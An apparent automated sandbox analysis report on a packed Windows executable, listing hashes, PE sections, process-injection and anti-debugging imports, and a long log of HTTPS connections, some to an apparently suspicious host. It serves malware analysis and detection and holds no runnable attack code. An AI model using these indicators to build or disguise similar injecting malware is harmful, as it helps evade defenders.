Preview:	)]}'.["",["southwest airlines flights","xbox indie game showcase","challengers movie","tampa bay rays city connect uniforms","spacex falcon 9 rocket launches","million dollar baby tommy richman lyrics","royal caribbean alaska cruise cancelled","apple iphone 16 pro max"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMXEzeWJ3M2tqEhlDaGFsbGVuZ2VycyDigJQgMjAyNCBmaWxtMv8QZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBYUFBQUNBd0VCQUFBQUFBQUFBQUFBQUFBRkJnSURCQWNCLzhRQU5SQUFBZ0VEQWdRREJRY0VBd0FBQUFBQUFRSURCQVVSQUNFR0VqRkJFeUpoVVhHQ

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.525154724460251
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	368'128 bytes
MD5:	b898ced2e152060f5770f1c6337006f6
SHA1:	b607705b76412adecc350bd38994d94ca3870f5a
SHA256:	716b19201a3109a3fb15b0401cb86a9be6df726c8b3a1a1c88cefb445457966b
SHA512:	4abd4a0c23f8d92c722246cab49797a840ebfd3cd4b900ba310ff243c529149b887620cfee3241c1605e1ae5dab501ee17a8d4de0634c8c52792677b107029a7
SSDEEP:	6144:YSgQdkTUGJXOjv5o1SDQadvOKfj7RG77sxEPqwt4vg51O+CNkvtPUavkb3eXr:1gSkTUGRODeaMKLtGfWLwCvRk1PJoeXr
TLSH:	BA74E01575C1C032EA33193615F0D6B89A7EFCB00AA25D9FB7944F7E4F30682D721A6A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e~..e~..e~.c.}..e~.c.{..e~.c.z..e~.c....e~..e...e~.r.z..e~.r.}..e~.r.{..e~.C.w..e~.C.\|..e~.Rich.e~.........PE..L...@./f...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4067b1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x662FF440 [Mon Apr 29 19:25:52 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	319c5a7bfce453072d64c94ea7770db9

Entrypoint Preview

Instruction
call 00007F2B84D874ACh
jmp 00007F2B84D86D39h
cmp ecx, dword ptr [00429040h]
jne 00007F2B84D86EC3h
ret
jmp 00007F2B84D877E9h
jmp 00007F2B84D879B9h
push ebp
mov ebp, esp
jmp 00007F2B84D86ECFh
push dword ptr [ebp+08h]
call 00007F2B84D9129Ch
pop ecx
test eax, eax
je 00007F2B84D86ED1h
push dword ptr [ebp+08h]
call 00007F2B84D8C3B7h
pop ecx
test eax, eax
je 00007F2B84D86EA8h
pop ebp
ret
cmp dword ptr [ebp+08h], FFFFFFFFh
je 00007F2B84D818FCh
jmp 00007F2B84D8798Eh
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F2B84D8797Eh
pop ecx
pop ebp
ret
push ebp
mov ebp, esp
test byte ptr [ebp+08h], 00000001h
push esi
mov esi, ecx
mov dword ptr [esi], 004201C0h
je 00007F2B84D86ECCh
push 0000000Ch
push esi
call 00007F2B84D86E9Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F2B84D86EDBh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F2B84D86ECCh
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F2B84D86ECEh
add edx, 28h
cmp edx, esi
jne 00007F2B84D86EACh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F2B84D86EBBh
push esi
call 00007F2B84D87930h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x27d40	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5c000	0x1b50	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x260f0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x26030	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1d3fa	0x1d400	50c407ffee16b8a5cec615ba161f19f2	False	0.5775824652777778	data	6.616382048222286	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1f000	0x9462	0x9600	f8425faa469bdff91679712cd12a53e3	False	0.38739583333333333	data	4.652555179364448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x29000	0x1eb4	0x1200	fb631e0825eb8197994a1c9222e5d15a	False	0.1703559027777778	DOS executable (block device driver \377\377\377\377,32-bit sector-support)	2.9508121929568962	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.Shine	0x2b000	0x300c3	0x30200	3666f9151b5251c040dff65cf631fd87	False	0.9969358766233766	data	7.998317289137794	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5c000	0x1b50	0x1c00	17ece04041abecd06a6ded35e787867d	False	0.75	data	6.504308533790372	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

VirtualProtect, WaitForSingleObject, CreateRemoteThread, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapAlloc, GetFileType, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2024 22:12:51.004234076 CEST	49678	443	192.168.2.4	104.46.162.224
Apr 29, 2024 22:12:52.098006010 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 29, 2024 22:12:57.158313036 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.158351898 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.158437014 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.179770947 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.179790020 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.414669037 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.414861917 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.481534958 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.481565952 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.482672930 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.482733965 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.485986948 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.528157949 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.772501945 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.772583008 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.772594929 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.772624016 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.772661924 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.772665024 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.772672892 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.772687912 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.772721052 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.772741079 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.895024061 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.895077944 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.895112991 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.895132065 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.895150900 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.895170927 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.898977995 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.899039984 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.899055004 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.899104118 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.899267912 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.899313927 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.899929047 CEST	49730	443	192.168.2.4	23.210.138.105
Apr 29, 2024 22:12:57.899950027 CEST	443	49730	23.210.138.105	192.168.2.4
Apr 29, 2024 22:12:57.915210962 CEST	49731	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:12:57.915268898 CEST	443	49731	95.217.242.142	192.168.2.4
Apr 29, 2024 22:12:57.915333986 CEST	49731	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:12:57.915781021 CEST	49731	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:12:57.915800095 CEST	443	49731	95.217.242.142	192.168.2.4
Apr 29, 2024 22:12:58.665095091 CEST	443	49731	95.217.242.142	192.168.2.4
Apr 29, 2024 22:12:58.665174007 CEST	49731	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:12:59.502841949 CEST	49731	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:12:59.502885103 CEST	443	49731	95.217.242.142	192.168.2.4
Apr 29, 2024 22:12:59.503360033 CEST	443	49731	95.217.242.142	192.168.2.4
Apr 29, 2024 22:12:59.503428936 CEST	49731	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:12:59.503737926 CEST	49731	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:12:59.544137001 CEST	443	49731	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:00.057988882 CEST	443	49731	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:00.058072090 CEST	443	49731	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:00.058068037 CEST	49731	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:00.058119059 CEST	49731	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:00.075508118 CEST	49731	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:00.075534105 CEST	443	49731	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:00.095911026 CEST	49732	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:00.095948935 CEST	443	49732	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:00.096018076 CEST	49732	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:00.098968983 CEST	49732	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:00.098982096 CEST	443	49732	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:00.555754900 CEST	443	49732	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:00.555833101 CEST	49732	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:00.687906981 CEST	49732	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:00.687922955 CEST	443	49732	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:00.689486980 CEST	49732	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:00.689493895 CEST	443	49732	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:01.401679993 CEST	443	49732	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:01.401813984 CEST	49732	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:01.401834011 CEST	443	49732	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:01.401854038 CEST	443	49732	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:01.401886940 CEST	49732	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:01.401920080 CEST	49732	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:01.447508097 CEST	49732	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:01.447537899 CEST	443	49732	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:01.581203938 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:01.581238031 CEST	443	49733	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:01.581304073 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:01.645967960 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:01.645987034 CEST	443	49733	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:01.707225084 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 29, 2024 22:13:02.120373964 CEST	443	49733	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:02.120441914 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:02.320388079 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:02.320396900 CEST	443	49733	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:02.322555065 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:02.322561026 CEST	443	49733	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:02.494721889 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.494740009 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.494792938 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.495289087 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.495301962 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.736068964 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.742697001 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.742712021 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.744165897 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.744225025 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.745878935 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.745968103 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.746172905 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.746181965 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.794450998 CEST	49739	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.794495106 CEST	443	49739	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.794555902 CEST	49739	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.795717001 CEST	49739	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.795732975 CEST	443	49739	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.797070980 CEST	49740	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.797107935 CEST	443	49740	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.797169924 CEST	49740	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.797874928 CEST	49740	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.797888994 CEST	443	49740	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.845002890 CEST	49741	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.845027924 CEST	443	49741	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.845087051 CEST	49741	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.845752001 CEST	49741	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.845768929 CEST	443	49741	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.859076977 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.933120966 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.933165073 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.933218002 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.933445930 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.933464050 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.990348101 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.990422964 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.990467072 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.990474939 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.990494013 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.990536928 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:02.992288113 CEST	443	49733	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:02.992353916 CEST	443	49733	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:02.992356062 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:02.992383957 CEST	443	49733	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:02.992402077 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:02.992434978 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:02.992446899 CEST	443	49733	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:02.992491007 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:02.992536068 CEST	443	49733	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:02.992598057 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:02.997369051 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:02.997426033 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.004940987 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.004997015 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.005007029 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.005122900 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.005166054 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.029989004 CEST	443	49739	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.032358885 CEST	443	49740	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.041255951 CEST	49739	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.041275024 CEST	443	49739	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.041642904 CEST	443	49739	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.042680025 CEST	49740	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.042687893 CEST	443	49740	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.043029070 CEST	443	49740	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.043776989 CEST	49740	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.043777943 CEST	49739	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.043842077 CEST	443	49740	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.043850899 CEST	443	49739	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.047774076 CEST	49739	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.057409048 CEST	49740	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.057611942 CEST	49739	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.057651043 CEST	443	49739	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.057770014 CEST	443	49739	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.057817936 CEST	49739	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.057884932 CEST	49739	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.080306053 CEST	443	49741	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.104120970 CEST	443	49740	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.135014057 CEST	49741	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.135023117 CEST	443	49741	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.136552095 CEST	443	49741	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.136568069 CEST	443	49741	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.136861086 CEST	49741	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.137765884 CEST	49741	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.137765884 CEST	49741	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.137830019 CEST	443	49741	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.168155909 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.245270014 CEST	49741	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.245271921 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.245281935 CEST	443	49741	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.435691118 CEST	49741	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.532311916 CEST	443	49741	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.532434940 CEST	443	49741	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.534941912 CEST	49741	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.691714048 CEST	443	49740	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.693480968 CEST	443	49740	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:03.693525076 CEST	49740	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:03.700900078 CEST	49740	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.381078005 CEST	49733	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:04.381099939 CEST	443	49733	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:04.400423050 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.400443077 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.402183056 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.402194023 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.402252913 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.403937101 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.404033899 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.482933998 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:04.482961893 CEST	443	49743	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:04.483036041 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:04.484129906 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:04.484143972 CEST	443	49743	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:04.484544039 CEST	49741	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.484560966 CEST	443	49741	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.485004902 CEST	49740	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.485030890 CEST	443	49740	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.487256050 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.487277031 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.510688066 CEST	49738	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.510704994 CEST	443	49738	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.512756109 CEST	49744	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.512795925 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.512846947 CEST	49744	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.513523102 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.513545990 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.513600111 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.514938116 CEST	49744	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.514955997 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.515727043 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.515743971 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.541340113 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.688893080 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.688963890 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.688990116 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.689014912 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.689034939 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.689080000 CEST	49742	443	192.168.2.4	142.250.191.164
